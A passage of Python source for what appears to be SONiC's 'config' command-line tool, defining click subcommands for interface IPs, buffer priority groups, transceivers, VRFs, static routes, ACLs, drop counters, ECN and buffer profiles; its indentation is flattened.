ip_input = ipaddress.ip_interface(ip_addr)
current_ip = ipaddress.ip_interface(key[1])
if (ip_input.version == current_ip.version):
# If user has configured IPv4/v6 address and the already available row is also IPv4/v6, delete it here.
config_db.set_entry("MGMT_INTERFACE", ("eth0", key[1]), None)
# Set the new row with new value
if not gw:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"NULL": "NULL"})
else:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"gwaddr": gw})
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
interface_entry = config_db.get_entry(table_name, interface_name)
if len(interface_entry) == 0:
if table_name == "VLAN_SUB_INTERFACE":
config_db.set_entry(table_name, interface_name, {"admin_status": "up"})
else:
config_db.set_entry(table_name, interface_name, {"NULL": "NULL"})
config_db.set_entry(table_name, (interface_name, ip_addr), {"NULL": "NULL"})
except ValueError:
ctx.fail("'ip_addr' is not valid.")
#
# 'del' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.pass_context
def remove(ctx, interface_name, ip_addr):
"""Remove an IP address from the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(ip_addr, strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), None)
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
config_db.set_entry(table_name, (interface_name, ip_addr), None)
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
if len(interface_dependent) == 0 and is_interface_bind_to_vrf(config_db, interface_name) is False:
config_db.set_entry(table_name, interface_name, None)
if multi_asic.is_multi_asic():
command = "sudo ip netns exec {} ip neigh flush dev {} {}".format(ctx.obj['namespace'], interface_name, ip_addr)
else:
command = "ip neigh flush dev {} {}".format(interface_name, ip_addr)
clicommon.run_command(command)
except ValueError:
ctx.fail("'ip_addr' is not valid.")
#
# buffer commands and utilities
#
def pgmaps_check_legality(ctx, interface_name, input_pg, is_new_pg):
"""
Tool function to check whether input_pg is legal.
Three checking performed:
1. Whether the input_pg is legal: pgs are in range [0-7]
2. Whether the input_pg overlaps an existing pg in the port
"""
config_db = ctx.obj["config_db"]
try:
lower = int(input_pg[0])
upper = int(input_pg[-1])
if upper < lower or lower < 0 or upper > 7:
ctx.fail("PG {} is not valid.".format(input_pg))
except Exception:
ctx.fail("PG {} is not valid.".format(input_pg))
# Check overlapping.
# To configure a new PG which is overlapping an existing one is not allowed
# For example, to add '5-6' while '3-5' existing is illegal
existing_pgs = config_db.get_table("BUFFER_PG")
if not is_new_pg:
if not (interface_name, input_pg) in existing_pgs.keys():
ctx.fail("PG {} doesn't exist".format(input_pg))
return
for k, v in existing_pgs.items():
port, existing_pg = k
if port == interface_name:
existing_lower = int(existing_pg[0])
existing_upper = int(existing_pg[-1])
if existing_upper < lower or existing_lower > upper:
# new and existing pgs disjoint, legal
pass
else:
ctx.fail("PG {} overlaps with existing PG {}".format(input_pg, existing_pg))
def update_pg(ctx, interface_name, pg_map, override_profile, add = True):
config_db = ctx.obj["config_db"]
# Check whether port is legal
ports = config_db.get_entry("PORT", interface_name)
if not ports:
ctx.fail("Port {} doesn't exist".format(interface_name))
# Check whether pg_map is legal
# Check whether there is other lossless profiles configured on the interface
pgmaps_check_legality(ctx, interface_name, pg_map, add)
# All checking passed
if override_profile:
profile_dict = config_db.get_entry("BUFFER_PROFILE", override_profile)
if not profile_dict:
ctx.fail("Profile {} doesn't exist".format(override_profile))
if not 'xoff' in profile_dict.keys() and 'size' in profile_dict.keys():
ctx.fail("Profile {} doesn't exist or isn't a lossless profile".format(override_profile))
profile_full_name = "[BUFFER_PROFILE|{}]".format(override_profile)
config_db.set_entry("BUFFER_PG", (interface_name, pg_map), {"profile": profile_full_name})
else:
config_db.set_entry("BUFFER_PG", (interface_name, pg_map), {"profile": "NULL"})
adjust_pfc_enable(ctx, interface_name, pg_map, True)
def remove_pg_on_port(ctx, interface_name, pg_map):
config_db = ctx.obj["config_db"]
# Check whether port is legal
ports = config_db.get_entry("PORT", interface_name)
if not ports:
ctx.fail("Port {} doesn't exist".format(interface_name))
# Remvoe all dynamic lossless PGs on the port
existing_pgs = config_db.get_table("BUFFER_PG")
removed = False
for k, v in existing_pgs.items():
port, existing_pg = k
if port == interface_name and (not pg_map or pg_map == existing_pg):
need_to_remove = False
referenced_profile = v.get('profile')
if referenced_profile and referenced_profile == '[BUFFER_PROFILE|ingress_lossy_profile]':
if pg_map:
ctx.fail("Lossy PG {} can't be removed".format(pg_map))
else:
continue
config_db.set_entry("BUFFER_PG", (interface_name, existing_pg), None)
adjust_pfc_enable(ctx, interface_name, pg_map, False)
removed = True
if not removed:
if pg_map:
ctx.fail("No specified PG {} found on port {}".format(pg_map, interface_name))
else:
ctx.fail("No lossless PG found on port {}".format(interface_name))
def adjust_pfc_enable(ctx, interface_name, pg_map, add):
config_db = ctx.obj["config_db"]
# Fetch the original pfc_enable
qosmap = config_db.get_entry("PORT_QOS_MAP", interface_name)
pfc_enable = qosmap.get("pfc_enable")
pfc_set = set()
if pfc_enable:
for priority in pfc_enable.split(","):
pfc_set.add(int(priority))
if pg_map:
lower_bound = int(pg_map[0])
upper_bound = int(pg_map[-1])
for priority in range(lower_bound, upper_bound + 1):
if add:
pfc_set.add(priority)
elif priority in pfc_set:
pfc_set.remove(priority)
empty_set = set()
pfc_enable = ""
if not pfc_set.issubset(empty_set):
for priority in pfc_set:
pfc_enable += str(priority) + ","
elif not add:
# Remove all
pfc_enable = ""
else:
ctx.fail("Try to add empty priorities")
qosmap["pfc_enable"] = pfc_enable[:-1]
config_db.set_entry("PORT_QOS_MAP", interface_name, qosmap)
#
# 'buffer' subgroup ('config interface buffer ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def buffer(ctx):
"""Set or clear buffer configuration"""
config_db = ctx.obj["config_db"]
if not is_dynamic_buffer_enabled(config_db):
ctx.fail("This command can only be executed on a system with dynamic buffer enabled")
#
# 'priority_group' subgroup ('config interface buffer priority_group ...')
#
@buffer.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def priority_group(ctx):
"""Set or clear buffer configuration"""
pass
#
# 'lossless' subgroup ('config interface buffer priority_group lossless ...')
#
@priority_group.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def lossless(ctx):
"""Set or clear lossless PGs"""
pass
#
# 'add' subcommand
#
@lossless.command('add')
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('pg_map', metavar='<pg_map>', required=True)
@click.argument('override_profile', metavar='<override_profile>', required=False)
@click.pass_context
def add_pg(ctx, interface_name, pg_map, override_profile):
"""Set lossless PGs for the interface"""
update_pg(ctx, interface_name, pg_map, override_profile)
#
# 'set' subcommand
#
@lossless.command('set')
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('pg_map', metavar='<pg_map>', required=True)
@click.argument('override_profile', metavar='<override_profile>', required=False)
@click.pass_context
def set_pg(ctx, interface_name, pg_map, override_profile):
"""Set lossless PGs for the interface"""
update_pg(ctx, interface_name, pg_map, override_profile, False)
#
# 'remove' subcommand
#
@lossless.command('remove')
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('pg_map', metavar='<pg_map', required=False)
@click.pass_context
def remove_pg(ctx, interface_name, pg_map):
"""Clear lossless PGs for the interface"""
remove_pg_on_port(ctx, interface_name, pg_map)
#
# 'cable_length' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('length', metavar='<length>', required=True)
@click.pass_context
def cable_length(ctx, interface_name, length):
"""Set lossless PGs for the interface"""
config_db = ctx.obj["config_db"]
if not is_dynamic_buffer_enabled(config_db):
ctx.fail("This command can only be supported on a system with dynamic buffer enabled")
# Check whether port is legal
ports = config_db.get_entry("PORT", interface_name)
if not ports:
ctx.fail("Port {} doesn't exist".format(interface_name))
try:
assert "m" == length[-1]
except Exception:
ctx.fail("Invalid cable length. Should be in format <num>m, like 300m".format(cable_length))
keys = config_db.get_keys("CABLE_LENGTH")
cable_length_set = {}
cable_length_set[interface_name] = length
config_db.mod_entry("CABLE_LENGTH", keys[0], cable_length_set)
#
# 'transceiver' subgroup ('config interface transceiver ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def transceiver(ctx):
"""SFP transceiver configuration"""
pass
#
# 'lpmode' subcommand ('config interface transceiver lpmode ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('state', metavar='(enable|disable)', type=click.Choice(['enable', 'disable']))
@click.pass_context
def lpmode(ctx, interface_name, state):
"""Enable/disable low-power mode for SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil lpmode {} {}".format("on" if state == "enable" else "off", interface_name)
clicommon.run_command(cmd)
#
# 'reset' subcommand ('config interface reset ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def reset(ctx, interface_name):
"""Reset SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil reset {}".format(interface_name)
clicommon.run_command(cmd)
#
# 'vrf' subgroup ('config interface vrf ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def vrf(ctx):
"""Bind or unbind VRF"""
pass
#
# 'bind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def bind(ctx, interface_name, vrf_name):
"""Bind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is True and \
config_db.get_entry(table_name, interface_name).get('vrf_name') == vrf_name:
return
# Clean ip addresses if interface configured
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
# When config_db del entry and then add entry with same key, the DEL will lost.
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
state_db = SonicV2Connector(use_unix_socket_path=True)
else:
state_db = SonicV2Connector(use_unix_socket_path=True, namespace=ctx.obj['namespace'])
state_db.connect(state_db.STATE_DB, False)
_hash = '{}{}'.format('INTERFACE_TABLE|', interface_name)
while state_db.get_all(state_db.STATE_DB, _hash) != None:
time.sleep(0.01)
state_db.close(state_db.STATE_DB)
config_db.set_entry(table_name, interface_name, {"vrf_name": vrf_name})
#
# 'unbind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def unbind(ctx, interface_name):
"""Unbind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("interface is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is False:
return
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
#
# 'vrf' group ('config vrf ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='vrf')
@click.pass_context
def vrf(ctx):
"""VRF-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {}
ctx.obj['config_db'] = config_db
@vrf.command('add')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def add_vrf(ctx, vrf_name):
"""Add vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_add_management_vrf(config_db)
else:
config_db.set_entry('VRF', vrf_name, {"NULL": "NULL"})
@vrf.command('del')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def del_vrf(ctx, vrf_name):
"""Del vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_delete_management_vrf(config_db)
else:
del_interface_bind_to_vrf(config_db, vrf_name)
config_db.set_entry('VRF', vrf_name, None)
@vrf.command('add_vrf_vni_map')
@click.argument('vrfname', metavar='<vrf-name>', required=True, type=str)
@click.argument('vni', metavar='<vni>', required=True)
@click.pass_context
def add_vrf_vni_map(ctx, vrfname, vni):
config_db = ctx.obj['config_db']
found = 0
if vrfname not in config_db.get_table('VRF').keys():
ctx.fail("vrf {} doesnt exists".format(vrfname))
if not vni.isdigit():
ctx.fail("Invalid VNI {}. Only valid VNI is accepted".format(vni))
if clicommon.vni_id_is_valid(int(vni)) is False:
ctx.fail("Invalid VNI {}. Valid range [1 to 16777215].".format(vni))
vxlan_table = config_db.get_table('VXLAN_TUNNEL_MAP')
vxlan_keys = vxlan_table.keys()
if vxlan_keys is not None:
for key in vxlan_keys:
if (vxlan_table[key]['vni'] == vni):
found = 1
break
if (found == 0):
ctx.fail("VLAN VNI not mapped. Please create VLAN VNI map entry first")
found = 0
vrf_table = config_db.get_table('VRF')
vrf_keys = vrf_table.keys()
if vrf_keys is not None:
for vrf_key in vrf_keys:
if ('vni' in vrf_table[vrf_key] and vrf_table[vrf_key]['vni'] == vni):
found = 1
break
if (found == 1):
ctx.fail("VNI already mapped to vrf {}".format(vrf_key))
config_db.mod_entry('VRF', vrfname, {"vni": vni})
@vrf.command('del_vrf_vni_map')
@click.argument('vrfname', metavar='<vrf-name>', required=True, type=str)
@click.pass_context
def del_vrf_vni_map(ctx, vrfname):
config_db = ctx.obj['config_db']
if vrfname not in config_db.get_table('VRF').keys():
ctx.fail("vrf {} doesnt exists".format(vrfname))
config_db.mod_entry('VRF', vrfname, {"vni": 0})
#
# 'route' group ('config route ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def route(ctx):
"""route-related configuration tasks"""
pass
@route.command('add', context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def add_route(ctx, command_str):
"""Add route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0, len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
@route.command('del', context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def del_route(ctx, command_str):
"""Del route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0, len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "no ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
#
# 'acl' group ('config acl ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def acl():
"""ACL-related configuration tasks"""
pass
#
# 'add' subgroup ('config acl add ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def add():
"""
Add ACL configuration.
"""
pass
def get_acl_bound_ports():
config_db = ConfigDBConnector()
config_db.connect()
ports = set()
portchannel_members = set()
portchannel_member_dict = config_db.get_table("PORTCHANNEL_MEMBER")
for key in portchannel_member_dict:
ports.add(key[0])
portchannel_members.add(key[1])
port_dict = config_db.get_table("PORT")
for key in port_dict:
if key not in portchannel_members:
ports.add(key)
return list(ports)
#
# 'table' subcommand ('config acl add table ...')
#
@add.command()
@click.argument("table_name", metavar="<table_name>")
@click.argument("table_type", metavar="<table_type>")
@click.option("-d", "--description")
@click.option("-p", "--ports")
@click.option("-s", "--stage", type=click.Choice(["ingress", "egress"]), default="ingress")
def table(table_name, table_type, description, ports, stage):
"""
Add ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
table_info = {"type": table_type}
if description:
table_info["policy_desc"] = description
else:
table_info["policy_desc"] = table_name
if ports:
table_info["ports@"] = ports
else:
table_info["ports@"] = ",".join(get_acl_bound_ports())
table_info["stage"] = stage
config_db.set_entry("ACL_TABLE", table_name, table_info)
#
# 'remove' subgroup ('config acl remove ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def remove():
"""
Remove ACL configuration.
"""
pass
#
# 'table' subcommand ('config acl remove table ...')
#
@remove.command()
@click.argument("table_name", metavar="<table_name>")
def table(table_name):
"""
Remove ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("ACL_TABLE", table_name, None)
#
# 'acl update' group
#
@acl.group(cls=clicommon.AbbreviationGroup)
def update():
"""ACL-related configuration tasks"""
pass
#
# 'full' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def full(file_name):
"""Full update of ACL rules configuration."""
log.log_info("'acl update full {}' executing...".format(file_name))
command = "acl-loader update full {}".format(file_name)
clicommon.run_command(command)
#
# 'incremental' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def incremental(file_name):
"""Incremental update of ACL rule configuration."""
log.log_info("'acl update incremental {}' executing...".format(file_name))
command = "acl-loader update incremental {}".format(file_name)
clicommon.run_command(command)
#
# 'dropcounters' group ('config dropcounters ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def dropcounters():
"""Drop counter related configuration tasks"""
pass
#
# 'install' subcommand ('config dropcounters install')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.argument("counter_type", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option("-a", "--alias", type=str, help="Alias for this counter")
@click.option("-g", "--group", type=str, help="Group for this counter")
@click.option("-d", "--desc", type=str, help="Description for this counter")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def install(counter_name, alias, group, counter_type, desc, reasons, verbose):
"""Install a new drop counter"""
command = "dropconfig -c install -n '{}' -t '{}' -r '{}'".format(counter_name, counter_type, reasons)
if alias:
command += " -a '{}'".format(alias)
if group:
command += " -g '{}'".format(group)
if desc:
command += " -d '{}'".format(desc)
clicommon.run_command(command, display_cmd=verbose)
#
# 'delete' subcommand ('config dropcounters delete')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def delete(counter_name, verbose):
"""Delete an existing drop counter"""
command = "dropconfig -c uninstall -n {}".format(counter_name)
clicommon.run_command(command, display_cmd=verbose)
#
# 'add_reasons' subcommand ('config dropcounters add_reasons')
#
@dropcounters.command('add-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def add_reasons(counter_name, reasons, verbose):
"""Add reasons to an existing drop counter"""
command = "dropconfig -c add -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'remove_reasons' subcommand ('config dropcounters remove_reasons')
#
@dropcounters.command('remove-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def remove_reasons(counter_name, reasons, verbose):
"""Remove reasons from an existing drop counter"""
command = "dropconfig -c remove -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'ecn' command ('config ecn ...')
#
@config.command()
@click.option('-profile', metavar='<profile_name>', type=str, required=True, help="Profile name")
@click.option('-rmax', metavar='<red threshold max>', type=int, help="Set red max threshold")
@click.option('-rmin', metavar='<red threshold min>', type=int, help="Set red min threshold")
@click.option('-ymax', metavar='<yellow threshold max>', type=int, help="Set yellow max threshold")
@click.option('-ymin', metavar='<yellow threshold min>', type=int, help="Set yellow min threshold")
@click.option('-gmax', metavar='<green threshold max>', type=int, help="Set green max threshold")
@click.option('-gmin', metavar='<green threshold min>', type=int, help="Set green min threshold")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def ecn(profile, rmax, rmin, ymax, ymin, gmax, gmin, verbose):
"""ECN-related configuration tasks"""
log.log_info("'ecn -profile {}' executing...".format(profile))
command = "ecnconfig -p %s" % profile
if rmax is not None: command += " -rmax %d" % rmax
if rmin is not None: command += " -rmin %d" % rmin
if ymax is not None: command += " -ymax %d" % ymax
if ymin is not None: command += " -ymin %d" % ymin
if gmax is not None: command += " -gmax %d" % gmax
if gmin is not None: command += " -gmin %d" % gmin
if verbose: command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'pfc' group ('config interface pfc ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def pfc(ctx):
"""Set PFC configuration."""
pass
#
# 'pfc asymmetric' ('config interface pfc asymmetric ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def asymmetric(ctx, interface_name, status):
"""Set asymmetric PFC configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config asymmetric {0} {1}".format(status, interface_name))
#
# 'pfc priority' command ('config interface pfc priority ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('priority', type=click.Choice([str(x) for x in range(8)]))
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def priority(ctx, interface_name, priority, status):
"""Set PFC priority configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config priority {0} {1} {2}".format(status, interface_name, priority))
#
# 'buffer' group ('config buffer ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def buffer(ctx):
"""Configure buffer_profile"""
config_db = ConfigDBConnector()
config_db.connect()
if not is_dynamic_buffer_enabled(config_db):
ctx.fail("This command can only be supported on a system with dynamic buffer enabled")
@buffer.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def profile(ctx):
"""Configure buffer profile"""
pass
@profile.command('add')
@click.argument('profile', metavar='<profile>', required=True)
@click.option('--xon', metavar='<xon>', type=int, help="Set xon threshold")
@click.option('--xoff', metavar='<xoff>', type=int, help="Set xoff threshold")
@click.option('--size', metavar='<size>', type=int, help="Set reserved size size")
@click.option('--dynamic_th', metavar='<dynamic_th>', type=str, help="Set dynamic threshold")
@click.option('--pool', metavar='<pool>', type=str, help="Buffer pool")
@clicommon.pass_db
def add_profile(db, profile, xon, xoff, size, dynamic_th, pool):
"""Add or modify a buffer profile"""
config_db = db.cfgdb
ctx = click.get_current_context()
profile_entry = config_db.get_entry('BUFFER_PROFILE', profile)
if profile_entry:
ctx.fail("Profile {} already exist".format(profile))
update_profile(ctx, config_db, profile, xon, xoff, size, dynamic_th, pool)
@profile.command('set')
@click.argument('profile', metavar='<profile>', required=True)
@click.option('--xon', metavar='<xon>', type=int, help="Set xon threshold")
@click.option('--xoff', metavar='<xoff>', type=int, help="Set xoff threshold")
@click.option('--size', metavar='<size>', type=int, help="Set reserved size size")
@click.option('--dynamic_th', metavar='<dynamic_th>', type=str, help="Set dynamic threshold")
@click.option('--pool', metavar='<pool>', type=str, help="Buffer pool")
@clicommon.pass_db
def set_profile(db, profile, xon, xoff, size, dynamic_th, pool):
"""Add or modify a buffer profile"""
config_db = db.cfgdb
ctx = click.get_current_context()
profile_entry = config_db.get_entry('BUFFER_PROFILE', profile)
if not profile_entry:
ctx.fail("Profile {} doesn't exist".format(profile))
if not 'xoff' in profile_entry.keys() and xoff:
ctx.fail("Can't change profile {} from dynamically calculating headroom to non-dynamically one".format(profile))
update_profile(ctx, config_db, profile, xon, xoff, size, dynamic_th, pool, profile_entry)
def update_profile(ctx, config_db, profile_name, xon, xoff, size, dynamic_th, pool, profile_entry = None):
params = {}
if profile_entry:
params = profile_entry
dynamic_calculate = True
if not pool:
pool = 'ingress_lossless_pool'
params['pool'] = '[BUFFER_POOL|' + pool + ']'
if not config_db.get_entry('BUFFER_POOL', pool):
ctx.fail("Pool {} doesn't exist".format(pool))
if xon:
params['xon'] = xon
dynamic_calculate = False
else:
xon = params.get('xon')
if xoff:
params['xoff'] = xoff
dynamic_calculate = False
else:
xoff = params.get('xoff')
if size:
params['size'] = size
dynamic_calculate = False
if xon and not xoff:
xoff = int(size) - int (xon)
params['xoff'] = xoff
elif not dynamic_calculate:
if xon and xoff:
size = int(xon) + int(xoff)
params['size'] = size
else:
ctx.fail("Either both xon and xoff or size should be provided")
if dynamic_calculate:
params['headroom_type'] = 'dynamic'
if not dynamic_th:
ctx.fail("Either size information (xon, xoff, size) or dynamic_th needs to be provided")
if dynamic_th:
params['dynamic_th'] = dynamic_th
else:
# Fetch all the keys of default_lossless_buffer_parameter table
# and then get the default_dynamic_th from that entry (should be only one)
keys = config_db.get_keys('DEFAULT_LOSSLESS_BUFFER_PARAMETER')
if len(keys) > 1 or len(keys) == 0:
